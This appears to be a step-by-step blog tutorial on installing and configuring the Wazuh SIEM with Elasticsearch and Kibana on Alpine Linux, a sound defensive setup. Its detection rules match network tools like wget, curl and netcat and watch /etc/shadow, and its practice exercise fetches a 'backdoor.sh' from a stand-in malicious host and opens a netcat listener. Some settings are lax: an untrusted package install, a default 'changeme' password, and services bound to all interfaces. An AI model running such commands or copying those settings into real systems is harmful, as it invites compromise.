Iโll show you how to set up SIEM (Security Information and Event Management) on Alpine Linux! SIEM helps you collect, analyze, and respond to security events across your systems. Think of it as a security camera system for your servers!
๐ค What is SIEM?
SIEM combines security information management and security event management. Itโs like having a security guard that watches all your systems 24/7, collecting logs, detecting threats, and alerting you to problems. Essential for any serious security setup!
Why use SIEM?
- Real-time threat detection
- Centralized log management
- Compliance reporting
- Incident investigation
- Automated responses
๐ฏ What You Need
Before starting, youโll need:
- Alpine Linux server (4GB+ RAM)
- Multiple systems to monitor
- Basic networking knowledge
- Storage space for logs
- About 45 minutes
๐ Step 1: Install Wazuh SIEM
Weโll use Wazuh, an open-source SIEM:
# Update system
apk update && apk upgrade
# Install dependencies
apk add curl wget git python3 py3-pip
apk add gcc g++ make linux-headers
apk add openssl openssl-dev
# Create wazuh user
adduser -D -H -s /sbin/nologin wazuh
# Download Wazuh
cd /opt
wget https://github.com/wazuh/wazuh/archive/v4.7.0.tar.gz
tar -xzf v4.7.0.tar.gz
cd wazuh-4.7.0
# Install Wazuh server
./install.sh
# Or use simpler method:
curl -so wazuh-install.sh https://packages.wazuh.com/4.7/wazuh-install.sh
chmod +x wazuh-install.sh
./wazuh-install.sh --wazuh-server wazuh-server๐ Step 2: Configure SIEM Components
Set up the main components:
# Configure Wazuh manager
cat > /var/ossec/etc/ossec.conf << 'EOF'
<ossec_config>
<global>
<jsonout_output>yes</jsonout_output>
<alerts_log>yes</alerts_log>
<logall>no</logall>
<logall_json>no</logall_json>
<email_notification>yes</email_notification>
<email_to>[email protected]</email_to>
<smtp_server>localhost</smtp_server>
<email_from>[email protected]</email_from>
</global>
<alerts>
<log_alert_level>3</log_alert_level>
<email_alert_level>12</email_alert_level>
</alerts>
<remote>
<connection>secure</connection>
<port>1514</port>
<protocol>tcp</protocol>
</remote>
<ruleset>
<decoder_dir>ruleset/decoders</decoder_dir>
<rule_dir>ruleset/rules</rule_dir>
<rule_exclude>0215-policy_rules.xml</rule_exclude>
<list>etc/lists/audit-keys</list>
</ruleset>
<auth>
<disabled>no</disabled>
<port>1515</port>
<use_source_ip>yes</use_source_ip>
<force_insert>no</force_insert>
<force_time>0</force_time>
<purge>yes</purge>
<use_password>yes</use_password>
<limit_maxagents>8000</limit_maxagents>
<ciphers>HIGH:!ADH:!EXP:!MD5:!RC4:!3DES:!CAMELLIA:@STRENGTH</ciphers>
</auth>
</ossec_config>
EOF
# Start Wazuh services
/var/ossec/bin/wazuh-control start๐ Step 3: Set Up Log Collection
Configure log sources:
# Configure syslog collection
cat >> /var/ossec/etc/ossec.conf << 'EOF'
<localfile>
<log_format>syslog</log_format>
<location>/var/log/messages</location>
</localfile>
<localfile>
<log_format>syslog</log_format>
<location>/var/log/secure</location>
</localfile>
<localfile>
<log_format>apache</log_format>
<location>/var/log/nginx/access.log</location>
</localfile>
<localfile>
<log_format>apache</log_format>
<location>/var/log/nginx/error.log</location>
</localfile>
<localfile>
<log_format>command</log_format>
<command>df -P</command>
<frequency>360</frequency>
</localfile>
<localfile>
<log_format>full_command</log_format>
<command>netstat -tulpn | sed 's/\([[:alnum:]]\+\)\ \+[[:digit:]]\+\ \+[[:digit:]]\+\ \+\(.*\):\([[:digit:]]*\)\ \+\([0-9\.\:\*]\+\).\+\ \([[:digit:]]*\/[[:alnum:]\-]*\).*/\1 \2 == \3 == \4 \5/' | sort -k 4 -g | sed 's/ == \(.*\) ==/:\1/' | sed 1,2d</command>
<frequency>360</frequency>
<alias>netstat listening ports</alias>
</localfile>
EOF
# Restart to apply changes
/var/ossec/bin/wazuh-control restart๐ Step 4: Install Elasticsearch
Set up data storage and search:
# Install Java (required for Elasticsearch)
apk add openjdk11-jre
# Download and install Elasticsearch
cd /opt
wget https://artifacts.elastic.co/downloads/elasticsearch/elasticsearch-7.17.9-linux-x86_64.tar.gz
tar -xzf elasticsearch-7.17.9-linux-x86_64.tar.gz
mv elasticsearch-7.17.9 elasticsearch
# Configure Elasticsearch
cat > /opt/elasticsearch/config/elasticsearch.yml << 'EOF'
cluster.name: wazuh-cluster
node.name: wazuh-node-1
path.data: /var/lib/elasticsearch
path.logs: /var/log/elasticsearch
network.host: 0.0.0.0
http.port: 9200
discovery.type: single-node
xpack.security.enabled: true
xpack.security.authc.api_key.enabled: true
EOF
# Create systemd service (or OpenRC for Alpine)
cat > /etc/init.d/elasticsearch << 'EOF'
#!/sbin/openrc-run
name="elasticsearch"
description="Elasticsearch"
command="/opt/elasticsearch/bin/elasticsearch"
command_user="elasticsearch:elasticsearch"
pidfile="/var/run/elasticsearch.pid"
start_stop_daemon_args="--background --make-pidfile"
depend() {
need net
}
EOF
chmod +x /etc/init.d/elasticsearch
# Create user and directories
adduser -D -H elasticsearch
mkdir -p /var/{lib,log}/elasticsearch
chown -R elasticsearch:elasticsearch /opt/elasticsearch /var/{lib,log}/elasticsearch
# Start Elasticsearch
rc-service elasticsearch start
rc-update add elasticsearch๐ Step 5: Deploy Kibana Dashboard
Install the visualization interface:
# Download Kibana
cd /opt
wget https://artifacts.elastic.co/downloads/kibana/kibana-7.17.9-linux-x86_64.tar.gz
tar -xzf kibana-7.17.9-linux-x86_64.tar.gz
mv kibana-7.17.9-linux-x86_64 kibana
# Configure Kibana
cat > /opt/kibana/config/kibana.yml << 'EOF'
server.port: 5601
server.host: "0.0.0.0"
elasticsearch.hosts: ["http://localhost:9200"]
elasticsearch.username: "kibana_system"
elasticsearch.password: "changeme"
logging.dest: /var/log/kibana/kibana.log
pid.file: /var/run/kibana.pid
EOF
# Create directories and set permissions
mkdir -p /var/log/kibana
adduser -D -H kibana
chown -R kibana:kibana /opt/kibana /var/log/kibana
# Start Kibana
sudo -u kibana /opt/kibana/bin/kibana &๐ Step 6: Configure Agents
Set up agents on systems to monitor:
# On each system to monitor, install Wazuh agent
# For Alpine Linux:
wget https://packages.wazuh.com/4.x/alpine/wazuh-agent-4.7.0-r1.apk
apk add --allow-untrusted wazuh-agent-4.7.0-r1.apk
# Configure agent
cat > /var/ossec/etc/ossec.conf << 'EOF'
<ossec_config>
<client>
<server>
<address>SIEM_SERVER_IP</address>
<port>1514</port>
<protocol>tcp</protocol>
</server>
<config-profile>alpine, alpine-linux</config-profile>
<notify_time>10</notify_time>
<time-reconnect>60</time-reconnect>
<auto_restart>yes</auto_restart>
</client>
<localfile>
<log_format>syslog</log_format>
<location>/var/log/messages</location>
</localfile>
<localfile>
<log_format>command</log_format>
<command>df -P</command>
<frequency>360</frequency>
</localfile>
<localfile>
<log_format>full_command</log_format>
<command>last -n 20</command>
<frequency>360</frequency>
</localfile>
</ossec_config>
EOF
# Register agent with server
/var/ossec/bin/agent-auth -m SIEM_SERVER_IP
# Start agent
/var/ossec/bin/wazuh-control start๐ Step 7: Create Detection Rules
Set up custom security rules:
# Create custom rules file
cat > /var/ossec/etc/rules/local_rules.xml << 'EOF'
<group name="local,syslog,">
<!-- SSH brute force detection -->
<rule id="100001" level="10">
<if_sid>5716</if_sid>
<same_source_ip />
<description>SSH brute force attack detected</description>
<group>authentication_failures,</group>
</rule>
<!-- Suspicious commands -->
<rule id="100002" level="8">
<if_sid>5401</if_sid>
<match>wget|curl|nc|netcat</match>
<description>Suspicious command execution detected</description>
</rule>
<!-- File integrity monitoring -->
<rule id="100003" level="12">
<if_sid>550</if_sid>
<match>/etc/passwd|/etc/shadow</match>
<description>Critical file modified</description>
</rule>
<!-- Port scan detection -->
<rule id="100004" level="10">
<if_sid>5601</if_sid>
<same_source_ip />
<description>Port scan detected</description>
</rule>
<!-- Privilege escalation -->
<rule id="100005" level="12">
<decoded_as>sudo</decoded_as>
<match>user NOT in sudoers</match>
<description>Unauthorized sudo attempt</description>
</rule>
</group>
EOF
# Test rules
/var/ossec/bin/wazuh-logtest๐ Step 8: Set Up Alerting
Configure alert notifications:
# Email alerts configuration
cat > /var/ossec/etc/shared/email_alerts.conf << 'EOF'
<ossec_config>
<email_alerts>
<email_to>[email protected]</email_to>
<level>10</level>
<format>full</format>
</email_alerts>
<email_alerts>
<email_to>[email protected]</email_to>
<level>12</level>
<format>sms</format>
</email_alerts>
<email_alerts>
<email_to>[email protected]</email_to>
<group>authentication_success</group>
<format>reports</format>
</email_alerts>
</ossec_config>
EOF
# Slack integration
cat > /var/ossec/integrations/slack << 'EOF'
#!/bin/sh
# Slack webhook integration
WEBHOOK_URL="https://hooks.slack.com/services/YOUR/WEBHOOK/URL"
ALERT_LEVEL=$1
ALERT_MSG=$2
if [ $ALERT_LEVEL -ge 10 ]; then
curl -X POST -H 'Content-type: application/json' \
--data "{\"text\":\"Security Alert: $ALERT_MSG\"}" \
$WEBHOOK_URL
fi
EOF
chmod +x /var/ossec/integrations/slack๐ Step 9: Create Dashboards
Build visualization dashboards:
# Import Wazuh dashboards
cd /tmp
curl -so wazuh-kibana-app.zip https://packages.wazuh.com/4.x/ui/kibana/wazuh_kibana-4.7.0_7.17.9.zip
cd /opt/kibana/plugins
unzip /tmp/wazuh-kibana-app.zip
# Restart Kibana
pkill -f kibana
sudo -u kibana /opt/kibana/bin/kibana &
# Create custom dashboard via API
curl -X POST "localhost:5601/api/saved_objects/dashboard" \
-H "Content-Type: application/json" \
-H "kbn-xsrf: true" \
-d '{
"attributes": {
"title": "Security Overview",
"hits": 0,
"description": "Main security dashboard",
"panelsJSON": "[{\"gridData\":{\"x\":0,\"y\":0,\"w\":24,\"h\":15},\"type\":\"visualization\",\"id\":\"alerts-evolution\"}]",
"version": 1,
"timeRestore": false,
"kibanaSavedObjectMeta": {
"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"
}
}
}'๐ฎ Practice Exercise
Try these SIEM tasks:
- Generate security events
- Create custom rules
- Build dashboards
- Test alerting
# Generate test events
# Failed SSH attempts
for i in {1..5}; do
ssh invalid@localhost 2>/dev/null
sleep 1
done
# Suspicious commands
wget http://malicious.example.com/backdoor.sh 2>/dev/null
nc -lvp 4444 &
# Check alerts
tail -f /var/ossec/logs/alerts/alerts.json | jq '.'
# View in Kibana
echo "Open browser to http://localhost:5601"
echo "Go to Wazuh plugin"
echo "Check Security Events dashboard"๐จ Troubleshooting Common Issues
Agent Connection Failed
Fix agent connectivity:
# On agent
/var/ossec/bin/agent-auth -m SIEM_SERVER_IP -p 1515
# Check agent status
/var/ossec/bin/wazuh-control status
# View agent logs
tail -f /var/ossec/logs/ossec.log
# On server, check agent list
/var/ossec/bin/manage_agents -l
# Restart agent
/var/ossec/bin/wazuh-control restartHigh Memory Usage
Optimize SIEM performance:
# Adjust Elasticsearch heap
echo "ES_JAVA_OPTS='-Xms2g -Xmx2g'" >> /opt/elasticsearch/config/jvm.options
# Limit Wazuh memory
cat >> /var/ossec/etc/internal_options.conf << 'EOF'
analysisd.min_rotate_interval=1h
analysisd.max_logs_per_second=100
monitord.rotate_log=1
EOF
# Enable log rotation
cat > /etc/logrotate.d/wazuh << 'EOF'
/var/ossec/logs/alerts/*.json {
daily
rotate 7
compress
missingok
notifempty
}
EOFMissing Alerts
Debug alert generation:
# Test rules
echo "Failed password for root from 192.168.1.100" | \
/var/ossec/bin/wazuh-logtest
# Check rule loading
/var/ossec/bin/wazuh-control status
grep -i error /var/ossec/logs/ossec.log
# Verify decoders
/var/ossec/bin/wazuh-logtest -v๐ก Pro Tips
Tip 1: Correlation Rules
Create advanced correlations:
<!-- Time-based correlation -->
<rule id="100010" level="14" frequency="5" timeframe="60">
<if_matched_sid>100001</if_matched_sid>
<same_source_ip />
<description>Multiple SSH brute force attempts</description>
</rule>Tip 2: Threat Intelligence
Integrate threat feeds:
# Download threat intelligence lists
wget https://rules.emergingthreats.net/blockrules/compromised-ips.txt
mv compromised-ips.txt /var/ossec/etc/lists/
# Create rule using list
cat >> /var/ossec/etc/rules/local_rules.xml << 'EOF'
<rule id="100020" level="12">
<list field="srcip" lookup="address_match_key">etc/lists/compromised-ips</list>
<description>Connection from known compromised IP</description>
</rule>
EOFTip 3: Automated Response
Set up active responses:
cat >> /var/ossec/etc/ossec.conf << 'EOF'
<active-response>
<command>firewall-drop</command>
<location>local</location>
<level>10</level>
<timeout>600</timeout>
</active-response>
EOFโ SIEM Best Practices
-
Log Everything Important
- Authentication events
- System changes
- Network connections
- Application logs
-
Tune Your Rules
- Start with defaults
- Add custom rules gradually
- Reduce false positives
- Test before production
-
Regular Maintenance
- Archive old logs
- Update threat feeds
- Review dashboards
- Test alerts monthly
-
Incident Response
- Document procedures
- Automate where possible
- Regular drills
- Learn from incidents
๐ What You Learned
Excellent work! You can now:
- โ Install and configure SIEM
- โ Collect logs from multiple sources
- โ Create detection rules
- โ Set up alerting
- โ Build security dashboards
Your security monitoring is now professional-grade!
๐ฏ Whatโs Next?
Now that SIEM is running, explore:
- Advanced threat hunting
- Security orchestration (SOAR)
- Compliance reporting
- Machine learning detection
Keep monitoring and stay secure! ๐ก๏ธ
